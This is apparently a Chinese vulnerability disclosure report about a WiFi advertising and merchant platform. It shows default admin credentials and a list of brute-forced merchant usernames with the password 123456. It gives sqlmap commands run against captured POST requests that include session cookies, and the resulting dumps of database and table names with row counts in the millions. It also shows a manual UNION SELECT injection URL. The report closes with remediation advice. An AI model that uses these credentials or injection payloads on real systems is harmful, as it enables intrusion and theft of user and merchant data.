2016-05-14: 细节已通知厂商并且等待厂商处理中 2016-05-18: 厂商已经确认,细节仅向厂商公开 2016-05-28: 细节向核心白帽子及相关领域专家公开 2016-06-07: 细节向普通白帽子公开 2016-06-17: 细节向实习白帽子公开 2016-07-02: 细节向公众公开
RT
首先是:**.**.**.**:10001/admin.php/Index/index.html admin admin进入
后台可修改app信息 这个后台没啥可以操作的哦
--------------------------------------------------------------------
然后来到这里http://**.**.**.**/ 商家管理后台 尝试爆破
这里376状态是都可以进的 密码123456 好多个 383状态估计是用户名正确的chengxin 123456jinyue 123456lining 123456qingxin 123456wangchao 123456wangxin 123456xiaodong123456xuxiaomei 123456yanghong 123456yun 123456
然后登陆了个王鑫汽车的账户
可以对app进行管理咯
在后台找到个sql注入sqlmap语法:sqlmap.py -r 1.txt --dbs---------------------post数据包----------参数catid--------- 这个注入点在修改分类这块POST /o2o/updateProductCateGrop.do HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 37Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/o2o/productCateGropInit.doAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522; JSESSIONID=1da7df7b-bac2-44de-9ebe-86eda561443bcatid=7316&cateGropName=1&ordernum=11
数据库信息back-end DBMS: MySQL 5.0available databases [17]:[*] ad_wifi[*] ad_wifi_online[*] ad_wifi_showlog[*] auth_cloub[*] auth_wifi[*] auth_wifi_databak[*] auth_wifi_toline[*] billing_system[*] information_schema[*] mdlch[*] personal_tailor[*] pkg_platform[*] red_packets[*] st_mdl[*] tenant[*] test[*] trade_01
当前库表信息 这里583w的商家信息+63的订单信息咯Database: auth_wifi+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| st_login_log | 14110424 || st_day_login | 12605281 || auth_connections_history | 11849367 || st_hour_count | 10752818 || wifi_user_shop | 8411638 || wifi_user_device | 5865862 || wifi_user | 5836911 || st_day_login_8history | 3686906 || stat_day | 1664443 || agent_ad_order_time | 1118218 || wifi_user_online_time | 982065 || auth_user | 802278 || auth_user_group_relate | 749158 || app_click_log | 697793 || zn_app_order | 639375 || zn_app_pay | 443122 || mdl_user_score_details | 393232 || auth_connections_tmp | 359406 || users_login_log | 299028 || st_day_area | 258574 || mdl_user | 241478 || mdl_user_20160504 | 212262 || mdl_user_wxinfo | 165720 || zn_st_settle_accounts | 139458 || auth_usergroup | 139208 || cash_auth_shop_day | 138273 || wap_stat_log | 133454 || mdl_user_coupon | 92528 || nodes_201504 | 86145 || nodes_201505 | 84555 || agent_child_day | 80292 || stat_month | 76690 || nodes_201506 | 76265 || wap_activity_menu | 76166 || nodes_201502 | 74710 || nodes_201501 | 74646 || nodes_201507 | 73591 || zn_app_tables | 71047 || nodes_201508 | 69654 || nodes_201509 | 61986 || shop_online_user | 61847 || f_agent_category | 57046 || user_roles | 53314 || user_role_module | 52786 || users | 52692 || auth_shop | 51980 || nodes_201503 | 49728 || sms_log | 47529 || auth_shop_mid | 42678 || auth_shop_20160127 | 42549 || users_20151222 | 40232 || zn_app_client | 40159 || mdl_redpacket_details | 37415 || auth_shop_module | 36411 || zn_app_product | 36125 || auth_shop_copy | 33355 || ad_advertis | 30122 || zn_app_shop_module | 28721 || mdl_table_category | 26740 || nodes | 25450 || auth_hotspot_count | 23498 || zn_app_order_group_buy | 23083 || auth_hotspot | 20274 || zn_app_install_day | 18733 || nodes_201510 | 18055 || auth_shop_bak | 17872 || user_role_module_bak | 15904 || wap_activity_feature | 15831 || weixin_userinfo | 14611 || auth_connections | 14045 || zn_app_order_detail | 13708 || auth_shop_card_detail | 12481 || device_router_bak | 12006 || device_router | 10327 | 1w多台路由信息吧| zn_app_user | 10290 || agent_ad_order_industry | 10199 || zn_app_group_buy | 8195 || zn_app_tables_fr | 7976 || zn_app_group_setmeal | 7706 || zn_app_product_categroy | 7316 || cash_auth_agent_day | 7007 || zn_app_ad | 6688 || auth_black_list | 6449 || agent_ad_show_log | 5347 || auth_shop_dynamicimage | 5319 || mdl_code_Jurisdiction | 5098 || agent_ad_st_industry_day | 4337 || zn_app_pay_history | 4012 || bossclick_msg | 3986 || dic_base_area | 3570 || auth_agent_order | 3405 || dic_county | 3173 || zn_app_mobile_click | 3127 || agent_ad_st_time_day | 3094 || zn_app_group_buy_bak | 2948 || zn_app_fastbuy_groupbuy | 2837 || zn_app_shop_groupbuynum | 2706 || auth_bussiness_department | 2558 || zn_app_hot_groupbuy | 2430 || zn_app_topic_groupbuy | 1684 || zn_app_activity_feature | 1681 || agent_ad_order_province | 1563 || auth_bussiness_news | 1482 || zn_app_version_his | 1389 || agent_ad_order_hotspot | 1305 || zn_app_agent_categroy | 1236 || zn_app_shop_top | 1112 || auth_shop_card_awards | 1067 || mdl_coupon_activity | 1014 || auth_shop_coupon_detail | 994 || zn_app_coupon_set | 966 || auth_shop_weixin | 961 || zn_app_banner | 836 || agent_sale | 807 || zn_app_agent_area | 684 || zn_app_comment | 667 || zn_app_topic | 643 || agent_online_user | 619 || zn_app_favorites_groupbuy | 592 || mdl_shop_clerk_wx_alert | 527 || agent_child_hour | 516 || auth_agent | 516 || agent_ad_st_area_day | 496 || auth_sms_log | 486 || zn_app_user_address | 466 || mdl_agent_cate | 455 || cash_account | 446 || zn_app_favorites | 444 || zn_app_agent_categroy_bak | 437 || zn_app_agent_fastbuy | 421 || auth_shop_print_device | 415 || agent_ad_position_day | 384 || dic_city | 364 || zn_app_pay_refund | 364 || zn_app_msg | 362 || zn_app_user_coupon | 360 || mdl_user_score_duiba_exchange_result | 359 || mdl_user_score_duiba_exchange_details | 355 || auth_shop_coupon | 339 || mdl_first_preferential | 335 || st_month_login | 329 || zn_app_banner_bak | 322 || auth_shop_card | 321 || agent_ad_show | 314 || zn_app_favorites_product | 286 || device_mac_white | 263 || f_category | 252 || zn_app_category_banner | 222 || zn_app_version | 207 || auth_agent_bak | 198 || auth_shop_card_bak | 198 || zn_app_topic_bak | 189 || sms_recharge_log | 185 || hd_activities | 164 || dic_ad_time | 151 || zn_app_agent_fastbuy_bak | 145 || zn_app_agent_info | 137 || auth_agent_buydevice_copy | 133 || copy_of_auth_agent_buydevice | 133 || mdl_industry_category | 127 || hd_userdetail | 122 || agent_ad_st_day | 114 || f_page | 112 || zn_mdl_feedback | 98 || auth_agent_pay_cfg | 96 || auth_agent_buydevice | 85 || agent_ad_order_source | 76 || zn_app_category_banner_bak | 68 || mdl_micro_subsidy | 67 || ad_collect | 66 || mdl_micro_subsidy_20160421 | 58 || hd_cat | 55 || agent_ad_order | 53 || st_tmp | 50 || zn_app_custom_details | 43 || wap_nav | 42 || dic_province | 31 || temp_group | 31 || mdl_agent_bankaccount | 29 || dic_mobile | 27 || ad_advertis_more | 26 || hd_comment | 26 || wx_user | 22 || radacct | 20 || agent_ad_owner | 16 || zn_app_product_tmp | 14 || counter | 11 || p_role | 11 || hd_report | 10 || auth_agent_open_city | 9 || auth_agent_user | 8 || dic_ad_position | 8 || dic_network | 8 || radcheck | 8 || dic_base_info | 6 || dic_refund_reason | 6 || auth_template | 5 || mdl_user_buy_score_pay | 5 || radgroupreply | 5 || auth_agent_buyorder | 4 || dic_profit | 4 || user_roles_url | 4 || auth_group | 3 || dic_device | 3 || dic_saleteam | 3 || mdl_system_config | 3 || auth_agent_social_share_cfg | 2 || dic_consume_meal | 2 || mdl_coin_activity | 2 || mdl_shop_welcome | 2 || open_token | 2 || wap_banner | 2 || wap_cat | 2 || auth_shop_pay_cfg | 1 || cs_product | 1 || dic_base_info_type | 1 || dic_collect | 1 || radgroupcheck | 1 || radusergroup | 1 || wap_user | 1 |+---------------------------------------+---------+
另外这里注入就是这块登陆的POST /ad/login.do HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 33Accept: */*Origin: http://**.**.**.**X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://**.**.**.**/Accept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: Hm_lvt_fabb4719e0914cb328fee76874faed38=1463082374,1463150971; Hm_lpvt_fabb4719e0914cb328fee76874faed38=1463155522username=yangfang&password=123456
available databases [6]:[*] ad_wifi[*] ad_wifi_online[*] ad_wifi_showlog[*] auth_wifi[*] information_schema[*] testDatabase: ad_wifi+--------------------+---------+| Table | Entries |+--------------------+---------+| ad_show_log_bak | 5494020 || ad_order_time | 990274 || ad_st_time_day | 442304 || ad_visit_log | 437092 || ad_st_industry_day | 400526 || ad_st_area_day | 143023 || ad_order_hotspot | 119858 || ad_order_industry | 85127 || ad_st_day | 30962 || ad_order_saleprice | 5626 || ad_order_province | 4636 || ad_order_source | 3247 || ad_owner_industry | 1373 || ad_show | 1316 || ad_order | 1035 || ad_owner | 625 || dic_time | 151 || ad_show_log | 8 || dic_saleprice | 6 || ad_agent_set | 4 || ad_account | 1 || ad_agent_shop | 1 || counter | 1 |+--------------------+---------+
http://**.**.**.**/login.ftl 然后来这个系统 爆破了下出来一个yangfan 123456
找到个注入点 学习手工注入下http://**.**.**.**/mdl/index_showDetail.do?pagId=-148%20%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16
出数据库
加强密码 过滤参数
危害等级:高
漏洞Rank:10
确认时间:2016-05-18 13:48
CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
666
